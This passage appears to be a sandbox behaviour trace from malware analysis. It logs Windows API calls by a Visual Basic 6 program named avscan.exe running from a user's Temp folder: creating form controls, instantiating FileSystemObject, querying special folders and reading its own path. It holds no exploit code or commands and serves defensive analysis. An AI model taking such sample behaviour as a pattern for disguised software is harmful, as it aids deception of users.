CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1d6, lpWindowName="Text3", dwStyle=0x440100e0, X=120, Y=0, nWidth=33, nHeight=19, hWndParent=0x103b8, hMenu=0x4, hInstance=0x72940000, lpParam=0x0) returned 0x103c0 [0135.949] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c0, Msg=0x81, wParam=0x0, lParam=0x28f5fc) returned 0x1 [0135.949] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c0, Msg=0x83, wParam=0x0, lParam=0x28f5e8) returned 0x0 [0135.950] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c0, Msg=0x1, wParam=0x0, lParam=0x28f5fc) returned 0x1 [0135.950] IsWindow (hWnd=0x103c0) returned 1 [0135.950] IsWindow (hWnd=0x103c0) returned 1 [0135.951] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c0, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0135.951] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c0, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0135.951] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c0, Msg=0x3, wParam=0x0, lParam=0x2007a) returned 0x0 [0135.951] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x14) returned 0x10e2978 [0135.952] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c0, Msg=0x30, wParam=0x860a07c4, lParam=0x0) returned 0x1 [0135.952] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c0, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0135.952] ShowWindow (hWnd=0x103c0, nCmdShow=5) returned 0 [0135.952] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c0, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0135.952] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xf4) returned 0x10eb6e0 [0135.952] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2998 [0135.953] lstrlenA (lpString="Text2") returned 5 [0135.953] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10eb7e0 [0135.953] lstrlenA (lpString="ThunderRT6") returned 10 [0135.953] lstrcpyA (in: lpString1=0x28fa18, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.953] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1d6, lpWindowName="Text2", dwStyle=0x440100e0, X=80, Y=0, nWidth=33, nHeight=19, hWndParent=0x103b8, hMenu=0x5, hInstance=0x72940000, lpParam=0x0) returned 0x103c2 [0135.953] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c2, Msg=0x81, wParam=0x0, lParam=0x28f5fc) returned 0x1 [0135.954] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c2, Msg=0x83, wParam=0x0, lParam=0x28f5e8) returned 0x0 [0135.954] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c2, Msg=0x1, wParam=0x0, lParam=0x28f5fc) returned 0x1 [0135.955] IsWindow (hWnd=0x103c2) returned 1 [0135.955] IsWindow (hWnd=0x103c2) returned 1 [0135.955] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c2, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0135.956] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c2, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0135.956] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c2, Msg=0x3, wParam=0x0, lParam=0x20052) returned 0x0 [0135.956] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x14) returned 0x10e29b8 [0135.956] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c2, Msg=0x30, wParam=0x860a07c4, lParam=0x0) returned 0x1 [0135.956] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c2, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0135.957] ShowWindow (hWnd=0x103c2, nCmdShow=5) returned 0 [0135.957] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c2, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0135.957] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xf4) returned 0x10eb7f0 [0135.957] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e29d8 [0135.957] lstrlenA (lpString="Text1") returned 5 [0135.957] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10eb8f0 [0135.957] lstrlenA (lpString="ThunderRT6") returned 10 [0135.957] lstrcpyA (in: lpString1=0x28fa18, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.957] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1d6, lpWindowName="Text1", dwStyle=0x440100e0, X=40, Y=0, nWidth=33, nHeight=19, hWndParent=0x103b8, hMenu=0x6, hInstance=0x72940000, lpParam=0x0) returned 0x103c4 [0135.958] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0x81, wParam=0x0, lParam=0x28f5fc) returned 0x1 [0135.958] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0x83, wParam=0x0, lParam=0x28f5e8) returned 0x0 [0135.958] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0x1, wParam=0x0, lParam=0x28f5fc) returned 0x1 [0135.959] IsWindow (hWnd=0x103c4) returned 1 [0135.959] IsWindow (hWnd=0x103c4) returned 1 [0135.959] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0135.960] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0135.960] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0x3, wParam=0x0, lParam=0x2002a) returned 0x0 [0135.960] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x14) returned 0x10e29f8 [0135.960] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0x30, wParam=0x860a07c4, lParam=0x0) returned 0x1 [0135.960] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0135.961] ShowWindow (hWnd=0x103c4, nCmdShow=5) returned 0 [0135.961] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0135.961] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xdc) returned 0x10eb900 [0135.961] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2a18 [0135.961] lstrlenA (lpString="Command3") returned 8 [0135.961] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x9) returned 0x10e1cd8 [0135.961] lstrlenA (lpString="ThunderRT6") returned 10 [0135.961] lstrcpyA (in: lpString1=0x28fa18, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.962] lstrlenA (lpString="ThunderRT6") returned 10 [0135.962] lstrcpyA (in: lpString1=0x28f9ac, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.962] GetClassInfoA (in: hInstance=0x0, lpClassName="Button", lpWndClass=0x28f9d8 | out: lpWndClass=0x28f9d8) returned 1 [0135.962] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6CommandButton", lpWndClass=0x28f9d8 | out: lpWndClass=0x28f9d8) returned 0 [0135.962] RegisterClassA (lpWndClass=0x28f9d8) returned 0x10c1d7 [0135.962] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1d7, lpWindowName="Command3", dwStyle=0x44012000, X=0, Y=48, nWidth=41, nHeight=25, hWndParent=0x103b8, hMenu=0x7, hInstance=0x72940000, lpParam=0x0) returned 0x103c6 [0135.962] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c6, Msg=0x81, wParam=0x0, lParam=0x28f5fc) returned 0x1 [0135.963] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c6, Msg=0x83, wParam=0x0, lParam=0x28f5e8) returned 0x0 [0135.963] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c6, Msg=0x1, wParam=0x0, lParam=0x28f5fc) returned 0x0 [0135.963] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c6, Msg=0x5, wParam=0x0, lParam=0x190029) returned 0x0 [0135.963] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c6, Msg=0x3, wParam=0x0, lParam=0x300000) returned 0x0 [0135.963] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x14) returned 0x10e2a38 [0135.964] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c6, Msg=0x30, wParam=0x860a07c4, lParam=0x0) returned 0x0 [0135.964] ShowWindow (hWnd=0x103c6, nCmdShow=5) returned 0 [0135.964] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c6, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0135.964] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xdc) returned 0x10eb9e8 [0135.964] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2a58 [0135.964] lstrlenA (lpString="Command2") returned 8 [0135.964] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x9) returned 0x10e1cf0 [0135.964] lstrlenA (lpString="ThunderRT6") returned 10 [0135.964] lstrcpyA (in: lpString1=0x28fa18, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.964] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1d7, lpWindowName="Command2", dwStyle=0x44012000, X=0, Y=24, nWidth=41, nHeight=25, hWndParent=0x103b8, hMenu=0x8, hInstance=0x72940000, lpParam=0x0) returned 0x103c8 [0135.965] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c8, Msg=0x81, wParam=0x0, lParam=0x28f5fc) returned 0x1 [0135.965] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c8, Msg=0x83, wParam=0x0, lParam=0x28f5e8) returned 0x0 [0135.965] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c8, Msg=0x1, wParam=0x0, lParam=0x28f5fc) returned 0x0 [0135.965] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c8, Msg=0x5, wParam=0x0, lParam=0x190029) returned 0x0 [0135.966] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c8, Msg=0x3, wParam=0x0, lParam=0x180000) returned 0x0 [0135.966] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x14) returned 0x10e2a78 [0135.966] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c8, Msg=0x30, wParam=0x860a07c4, lParam=0x0) returned 0x0 [0135.966] ShowWindow (hWnd=0x103c8, nCmdShow=5) returned 0 [0135.966] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103c8, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0135.966] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xdc) returned 0x10ebad0 [0135.967] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2a98 [0135.967] lstrlenA (lpString="Command1") returned 8 [0135.967] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x9) returned 0x10e1d08 [0135.967] lstrlenA (lpString="ThunderRT6") returned 10 [0135.967] lstrcpyA (in: lpString1=0x28fa18, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.967] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1d7, lpWindowName="Command1", dwStyle=0x44012000, X=0, Y=0, nWidth=41, nHeight=25, hWndParent=0x103b8, hMenu=0x9, hInstance=0x72940000, lpParam=0x0) returned 0x103ca [0135.967] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103ca, Msg=0x81, wParam=0x0, lParam=0x28f5fc) returned 0x1 [0135.968] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103ca, Msg=0x83, wParam=0x0, lParam=0x28f5e8) returned 0x0 [0135.968] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103ca, Msg=0x1, wParam=0x0, lParam=0x28f5fc) returned 0x0 [0135.968] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103ca, Msg=0x5, wParam=0x0, lParam=0x190029) returned 0x0 [0135.969] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103ca, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0135.969] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x14) returned 0x10e2ab8 [0135.969] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103ca, Msg=0x30, wParam=0x860a07c4, lParam=0x0) returned 0x0 [0135.969] ShowWindow (hWnd=0x103ca, nCmdShow=5) returned 0 [0135.969] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103ca, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0135.969] GetClientRect (in: hWnd=0x103b8, lpRect=0x28fb88 | out: lpRect=0x28fb88) returned 1 [0136.033] MapWindowPoints (in: hWndFrom=0x103b8, hWndTo=0x0, lpPoints=0x28fb88, cPoints=0x2 | out: lpPoints=0x28fb88) returned 14745803 [0136.033] EqualRect (lprc1=0x28fb88, lprc2=0x28fb68) returned 1 [0136.034] SetEvent (hEvent=0x138) returned 1 [0136.035] IsIconic (hWnd=0x103b8) returned 0 [0136.035] SendMessageA (hWnd=0x103b8, Msg=0x80, wParam=0x1, lParam=0xa00d9) returned 0x0 [0136.035] NtdllDefWindowProc_A (hWnd=0x103b8, Msg=0x80, wParam=0x1, lParam=0xa00d9) returned 0x0 [0136.333] SysReAllocStringLen (in: pbstr=0x28ef2c*=0x0, psz="MSVBVM60.DLL", len=0xc | out: pbstr=0x28ef2c*="MSVBVM60.DLL") returned 1 [0136.333] CharLowerBuffW (in: lpsz="MSVBVM60.DLL", cchLength=0xc | out: lpsz="msvbvm60.dll") returned 0xc [0136.333] GetModuleHandleW (lpModuleName="C:\\Windows\\system32\\MSVBVM60.DLL") returned 0x72940000 [0136.334] NtdllDefWindowProc_A (hWnd=0x103b8, Msg=0xd, wParam=0x208, lParam=0x28e3a8) returned 0x0 [0136.335] NtdllDefWindowProc_A (hWnd=0x103b8, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x503a3 [0136.335] NtdllDefWindowProc_A (hWnd=0x103b8, Msg=0xd, wParam=0x208, lParam=0x28e408) returned 0x0 [0136.336] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103be, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0136.336] GetFocus () returned 0x0 [0136.336] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c0, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0136.336] GetFocus () returned 0x0 [0136.336] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c2, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0136.336] GetFocus () returned 0x0 [0136.336] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0136.337] GetFocus () returned 0x0 [0136.337] IsIconic (hWnd=0x103b8) returned 0 [0136.337] IsZoomed (hWnd=0x103b8) returned 0 [0136.337] GetClientRect (in: hWnd=0x103b8, lpRect=0x28fb7c | out: lpRect=0x28fb7c) returned 1 [0136.337] GetWindow (hWnd=0x103b8, uCmd=0x5) returned 0x103ba [0136.337] GetWindow (hWnd=0x103ba, uCmd=0x2) returned 0x103bc [0136.337] GetParent (hWnd=0x103ba) returned 0x103b8 [0136.337] GetWindow (hWnd=0x103bc, uCmd=0x2) returned 0x103be [0136.338] GetParent (hWnd=0x103bc) returned 0x103b8 [0136.338] GetWindow (hWnd=0x103be, uCmd=0x2) returned 0x103c0 [0136.338] GetParent (hWnd=0x103be) returned 0x103b8 [0136.338] GetWindow (hWnd=0x103c0, uCmd=0x2) returned 0x103c2 [0136.338] GetParent (hWnd=0x103c0) returned 0x103b8 [0136.338] GetWindow (hWnd=0x103c2, uCmd=0x2) returned 0x103c4 [0136.338] GetParent (hWnd=0x103c2) returned 0x103b8 [0136.339] GetWindow (hWnd=0x103c4, uCmd=0x2) returned 0x103c6 [0136.339] GetParent (hWnd=0x103c4) returned 0x103b8 [0136.339] GetWindow (hWnd=0x103c6, uCmd=0x2) returned 0x103c8 [0136.339] GetParent (hWnd=0x103c6) returned 0x103b8 [0136.339] GetWindow (hWnd=0x103c8, uCmd=0x2) returned 0x103ca [0136.339] GetParent (hWnd=0x103c8) returned 0x103b8 [0136.339] GetWindow (hWnd=0x103ca, uCmd=0x2) returned 0x0 [0136.339] GetParent (hWnd=0x103ca) returned 0x103b8 [0136.573] CLSIDFromProgIDEx (in: lpszProgID="scripting.filesystemobject", lpclsid=0x28f648 | out: lpclsid=0x28f648*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0136.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0136.584] CoCreateInstance (in: rclsid=0x28f648*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x7295a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28f6ec | out: ppv=0x28f6ec*=0xf22be0) returned 0x0 [0136.591] SysReAllocStringLen (in: pbstr=0x28e4ac*=0x0, psz="SXS.DLL", len=0x7 | out: pbstr=0x28e4ac*="SXS.DLL") returned 1 [0136.591] CharLowerBuffW (in: lpsz="SXS.DLL", cchLength=0x7 | out: lpsz="sxs.dll") returned 0x7 [0136.591] LoadLibraryW (lpLibFileName="SXS.DLL") returned 0x72ec0000 [0136.591] GetLastError () returned 0x0 [0136.591] SetLastError (dwErrCode=0x0) [0136.592] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32RedirectTypeLibrary") returned 0x72ec207d [0136.593] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="ADVAPI32.dll", cbMultiByte=12, lpWideCharStr=0x28d418, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll") returned 12 [0136.593] SysReAllocStringLen (in: pbstr=0x28e41c*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x28e41c*="ADVAPI32.dll") returned 1 [0136.593] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0136.593] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76f40000 [0136.594] GetLastError () returned 0x0 [0136.594] SetLastError (dwErrCode=0x0) [0136.594] GetProcAddress (hModule=0x76f40000, lpProcName="RegOpenKeyW") returned 0x76f52459 [0136.595] GetProcAddress (hModule=0x76f40000, lpProcName="RegQueryValueW") returned 0x76f544b4 [0136.600] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32MapConfiguredClsidToReferenceClsid") returned 0x72ec171e [0136.601] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22be0, riid=0x72970540*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x28f6fc | out: ppvObject=0x28f6fc*=0x0) returned 0x80004002 [0136.601] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22be0, riid=0x72970750*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x28f700 | out: ppvObject=0x28f700*=0x0) returned 0x80004002 [0136.601] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22be0, riid=0x72970450*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f6cc | out: ppvObject=0x28f6cc*=0xf22be0) returned 0x0 [0136.601] FileSystemObject:IUnknown:Release (This=0xf22be0) returned 0x1 [0136.601] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22be0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f698*="getspecialfolder", cNames=0x1, lcid=0x409, rgDispId=0x28f69c | out: rgDispId=0x28f69c*=10014) returned 0x0 [0136.602] FileSystemObject:IDispatch:Invoke (in: This=0xf22be0, dispIdMember=10014, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f66c*(rgvarg=([0]=0x28f6f4*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f64c, puArgErr=0x28f67c | out: pDispParams=0x28f66c*(rgvarg=([0]=0x28f6f4*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x9, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1=0xf22c3c, varVal2=0x0), pExcepInfo=0x28f64c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f67c*=0x72a478d9) returned 0x0 [0136.602] FileSystemObject:IUnknown:AddRef (This=0xf22c3c) returned 0x2 [0136.602] FileSystemObject:IUnknown:Release (This=0xf22c3c) returned 0x1 [0136.603] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22be0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f698*="getspecialfolder", cNames=0x1, lcid=0x409, rgDispId=0x28f69c | out: rgDispId=0x28f69c*=10014) returned 0x0 [0136.603] FileSystemObject:IDispatch:Invoke (in: This=0xf22be0, dispIdMember=10014, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f66c*(rgvarg=([0]=0x28f6f4*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f64c, puArgErr=0x28f67c | out: pDispParams=0x28f66c*(rgvarg=([0]=0x28f6f4*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x9, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1=0xf22cec, varVal2=0x0), pExcepInfo=0x28f64c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f67c*=0x72a478d9) returned 0x0 [0136.603] FileSystemObject:IUnknown:AddRef (This=0xf22cec) returned 0x2 [0136.603] FileSystemObject:IUnknown:Release (This=0xf22cec) returned 0x1 [0136.605] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xfc) returned 0x10ebbb8 [0136.605] GetCurrentThreadId () returned 0xfd8 [0136.605] GetCurrentThreadId () returned 0xfd8 [0136.605] GetCurrentThreadId () returned 0xfd8 [0136.605] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x12) returned 0x10e2ad8 [0136.605] SetWindowTextA (hWnd=0x60066, lpString="Using Shell32.dll") returned 1 [0136.605] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0xc, wParam=0x0, lParam=0x10e2ad8) returned 0x1 [0136.606] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x1) returned 0x10ebcc0 [0136.606] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x12) returned 0x10e2af8 [0136.606] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x12) returned 0x10e2b18 [0136.606] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2b38 [0136.606] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f560, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0136.606] lstrcpynA (in: lpString1=0x28f44c, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", iMaxLength=260 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0136.606] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 47 [0136.606] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebcd0 [0136.606] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebd08 [0136.606] lstrcpyA (in: lpString1=0x10ebcd0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0136.661] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x25) returned 0x10ebd40 [0136.661] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebd08 | out: hHeap=0x10d0000) returned 1 [0136.661] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0136.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0136.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=-1, lpWideCharStr=0x114fbdc, cchWideChar=37 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37 [0136.662] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebd40 | out: hHeap=0x10d0000) returned 1 [0136.662] SysStringLen (param_1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x24 [0136.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=37, lpMultiByteStr=0x114fc44, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 37 [0136.665] SetWindowTextA 